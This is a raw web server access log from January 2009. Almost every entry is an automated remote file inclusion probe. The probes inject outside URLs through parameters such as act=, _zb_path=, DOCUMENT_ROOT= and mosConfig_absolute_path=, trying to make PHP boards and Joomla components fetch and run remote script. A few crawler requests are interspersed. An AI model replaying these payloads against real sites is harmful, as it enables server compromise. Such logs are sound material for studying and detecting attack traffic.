124.138.125.66 - - [02/Jan/2009:21:24:09 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.65" 237 586
124.138.125.66 - - [02/Jan/2009:21:24:09 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.65" 251 601
124.138.125.66 - - [02/Jan/2009:21:24:09 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.65" 249 599
211.202.2.220 - - [02/Jan/2009:21:24:40 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 220 601
211.202.2.220 - - [02/Jan/2009:21:24:40 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 206 586
211.202.2.220 - - [02/Jan/2009:21:24:41 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 210 591
222.121.123.91 - - [02/Jan/2009:21:24:48 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
222.121.123.91 - - [02/Jan/2009:21:24:48 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.803" 249 601
222.121.123.91 - - [02/Jan/2009:21:24:48 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
222.121.123.91 - - [02/Jan/2009:21:24:48 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
203.231.233.54 - - [02/Jan/2009:21:24:48 +0000] "GET /log/web.log.4//index.php?DOCUMENT_ROOT=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 361 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" 248 600
222.121.123.91 - - [02/Jan/2009:21:24:48 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.803" 249 601
222.121.123.91 - - [02/Jan/2009:21:24:48 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
203.231.233.54 - - [02/Jan/2009:21:24:48 +0000] "GET //index.php?DOCUMENT_ROOT=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 346 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" 234 585
203.231.233.54 - - [02/Jan/2009:21:24:49 +0000] "GET /log//index.php?DOCUMENT_ROOT=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 351 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" 238 590
81.94.239.16 - - [02/Jan/2009:21:27:55 +0000] "GET /log/web.log.3//?_zb_path=http://ubii.freehostia.com/v6-i.txt??? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 180 591
81.94.239.16 - - [02/Jan/2009:21:27:55 +0000] "GET //?_zb_path=http://ubii.freehostia.com/v6-i.txt??? HTTP/1.1" 200 16348 "-" "libwww-perl/5.79" 166 16665
81.94.239.16 - - [02/Jan/2009:21:27:56 +0000] "GET /log//?_zb_path=http://ubii.freehostia.com/v6-i.txt??? HTTP/1.1" 200 3178 "-" "libwww-perl/5.79" 170 3405
218.234.21.131 - - [02/Jan/2009:21:28:49 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 233 601
218.234.21.131 - - [02/Jan/2009:21:28:50 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 219 586
218.234.21.131 - - [02/Jan/2009:21:28:51 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 223 591
124.138.125.66 - - [02/Jan/2009:21:35:19 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.65" 251 601
124.138.125.66 - - [02/Jan/2009:21:35:19 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.65" 241 591
124.138.125.66 - - [02/Jan/2009:21:35:19 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.65" 237 586
222.121.123.91 - - [02/Jan/2009:21:35:42 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
211.202.2.220 - - [02/Jan/2009:21:35:47 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 206 586
211.202.2.220 - - [02/Jan/2009:21:35:48 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 210 591
222.121.123.91 - - [02/Jan/2009:21:35:48 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
211.202.2.220 - - [02/Jan/2009:21:35:49 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 220 601
222.121.123.91 - - [02/Jan/2009:21:35:49 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
211.202.2.220 - - [02/Jan/2009:21:36:20 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.79" 218 599
211.202.2.220 - - [02/Jan/2009:21:36:20 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 206 586
211.202.2.220 - - [02/Jan/2009:21:36:20 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 210 591
193.86.246.132 - - [02/Jan/2009:21:36:27 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.813" 238 586
193.86.246.132 - - [02/Jan/2009:21:36:27 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.813" 242 591
193.86.246.132 - - [02/Jan/2009:21:36:28 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.813" 252 601
222.121.123.91 - - [02/Jan/2009:21:36:33 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
222.121.123.91 - - [02/Jan/2009:21:36:33 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.803" 247 599
222.121.123.91 - - [02/Jan/2009:21:36:33 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
222.121.123.91 - - [02/Jan/2009:21:36:34 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.803" 247 599
222.121.123.91 - - [02/Jan/2009:21:36:34 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
124.138.125.66 - - [02/Jan/2009:21:37:16 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.65" 241 591
124.138.125.66 - - [02/Jan/2009:21:37:16 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.65" 249 599
124.138.125.66 - - [02/Jan/2009:21:37:16 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.65" 237 586
124.138.125.66 - - [02/Jan/2009:21:37:27 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.65" 251 601
193.86.246.132 - - [02/Jan/2009:21:37:47 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.813" 242 591
193.86.246.132 - - [02/Jan/2009:21:37:47 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.813" 250 599
193.86.246.132 - - [02/Jan/2009:21:37:47 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.813" 238 586
218.234.21.131 - - [02/Jan/2009:21:37:57 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 233 601
218.234.21.131 - - [02/Jan/2009:21:37:57 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 223 591
218.234.21.131 - - [02/Jan/2009:21:37:58 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 219 586
222.121.123.91 - - [02/Jan/2009:21:38:16 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.803" 249 601
222.121.123.91 - - [02/Jan/2009:21:38:17 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.803" 249 601
211.202.2.220 - - [02/Jan/2009:21:38:26 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 220 601
193.86.246.132 - - [02/Jan/2009:21:38:48 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.813" 252 601
218.234.21.131 - - [02/Jan/2009:21:39:56 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 223 591
218.234.21.131 - - [02/Jan/2009:21:39:57 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.79" 231 599
218.234.21.131 - - [02/Jan/2009:21:39:57 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 219 586
218.234.21.131 - - [02/Jan/2009:21:42:21 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://srip.yonsei.ac.kr/zboard_eng//skin/zero_vote/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 233 601
70.87.63.234 - - [02/Jan/2009:21:57:07 +0000] "GET /log/custompluginfile[]=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 398 "-" "libwww-perl/5.810" 184 637
70.87.63.234 - - [02/Jan/2009:21:57:07 +0000] "GET /custompluginfile[]=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 394 "-" "libwww-perl/5.810" 180 633
70.87.63.234 - - [02/Jan/2009:21:57:07 +0000] "GET /log/web.log.5/custompluginfile[]=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 408 "-" "libwww-perl/5.810" 194 647
124.138.125.66 - - [02/Jan/2009:21:57:07 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.65" 237 586
124.138.125.66 - - [02/Jan/2009:21:57:07 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.65" 251 601
124.138.125.66 - - [02/Jan/2009:21:57:07 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.65" 241 591
72.29.78.145 - - [02/Jan/2009:21:58:32 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.810" 249 601
72.29.78.145 - - [02/Jan/2009:21:58:33 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.810" 239 591
72.29.78.145 - - [02/Jan/2009:21:58:33 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.810" 235 586
70.87.63.234 - - [02/Jan/2009:21:59:00 +0000] "GET /log/web.log.3/custompluginfile[]=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 408 "-" "libwww-perl/5.810" 194 647
124.138.125.66 - - [02/Jan/2009:21:59:26 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.65" 241 591
124.138.125.66 - - [02/Jan/2009:21:59:26 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.65" 251 601
124.138.125.66 - - [02/Jan/2009:21:59:26 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.65" 237 586
211.202.2.220 - - [02/Jan/2009:22:00:26 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 220 601
211.202.2.220 - - [02/Jan/2009:22:00:26 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 206 586
211.202.2.220 - - [02/Jan/2009:22:00:26 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 210 591
70.87.63.234 - - [02/Jan/2009:22:01:08 +0000] "GET /log/web.log.5%20/custompluginfile[]=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 409 "-" "libwww-perl/5.810" 197 648
193.86.246.132 - - [02/Jan/2009:22:02:49 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.813" 252 601
193.86.246.132 - - [02/Jan/2009:22:02:53 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.813" 238 586
193.86.246.132 - - [02/Jan/2009:22:02:53 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.813" 242 591
211.202.2.220 - - [02/Jan/2009:22:03:28 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 206 586
211.202.2.220 - - [02/Jan/2009:22:03:28 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 210 591
211.202.2.220 - - [02/Jan/2009:22:03:29 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.79" 220 601
72.29.78.145 - - [02/Jan/2009:22:03:36 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.810" 239 591
72.29.78.145 - - [02/Jan/2009:22:03:39 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.810" 235 586
72.29.78.145 - - [02/Jan/2009:22:03:41 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.810" 249 601
222.121.123.91 - - [02/Jan/2009:22:04:38 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.803" 249 601
222.121.123.91 - - [02/Jan/2009:22:04:38 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
222.121.123.91 - - [02/Jan/2009:22:04:38 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
222.121.123.91 - - [02/Jan/2009:22:06:03 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
222.121.123.91 - - [02/Jan/2009:22:06:44 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
222.121.123.91 - - [02/Jan/2009:22:06:45 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.803" 249 601
222.121.123.91 - - [02/Jan/2009:22:06:49 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
222.121.123.91 - - [02/Jan/2009:22:07:52 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
222.121.123.91 - - [02/Jan/2009:22:07:52 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.803" 249 601
222.121.123.91 - - [02/Jan/2009:22:07:52 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
193.86.246.132 - - [02/Jan/2009:22:09:43 +0000] "GET /log/web.log.3//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 362 "-" "libwww-perl/5.813" 252 601
193.86.246.132 - - [02/Jan/2009:22:09:43 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.813" 238 586
193.86.246.132 - - [02/Jan/2009:22:09:43 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.813" 242 591
67.195.37.159 - - [02/Jan/2009:22:10:54 +0000] "GET /robots.txt HTTP/1.0" 404 347 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 191 586
67.195.37.159 - - [02/Jan/2009:22:10:55 +0000] "GET /WColumn.htm HTTP/1.0" 200 8589 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 394 8905
67.195.37.159 - - [02/Jan/2009:22:10:55 +0000] "GET /YTCC.css HTTP/1.0" 304 - "http://www.ytcc.co.uk/WColumn.htm" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 500 210
211.202.2.220 - - [02/Jan/2009:22:12:02 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.79" 218 599
211.202.2.220 - - [02/Jan/2009:22:12:02 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.79" 210 591
211.202.2.220 - - [02/Jan/2009:22:12:02 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.79" 206 586
222.121.123.91 - - [02/Jan/2009:22:15:46 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.803" 247 599
222.121.123.91 - - [02/Jan/2009:22:15:46 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
222.121.123.91 - - [02/Jan/2009:22:15:46 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
222.121.123.91 - - [02/Jan/2009:22:16:54 +0000] "GET /log/web.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 360 "-" "libwww-perl/5.803" 247 599
222.121.123.91 - - [02/Jan/2009:22:16:54 +0000] "GET /log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 352 "-" "libwww-perl/5.803" 239 591
222.121.123.91 - - [02/Jan/2009:22:16:54 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.henneferkanuteam.de/apboard/info.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" 235 586
216.168.96.50 - - [02/Jan/2009:22:18:52 +0000] "GET /log/web.log.4//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 418 "-" "libwww-perl/5.65" 266 657
216.168.96.50 - - [02/Jan/2009:22:18:52 +0000] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 403 "-" "libwww-perl/5.65" 252 642
216.168.96.50 - - [02/Jan/2009:22:18:52 +0000] "GET /log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 408 "-" "libwww-perl/5.65" 256 647
124.138.125.66 - - [02/Jan/2009:22:20:11 +0000] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt???? HTTP/1.1" 404 347 "-" "libwww-perl/5.65" 237 586
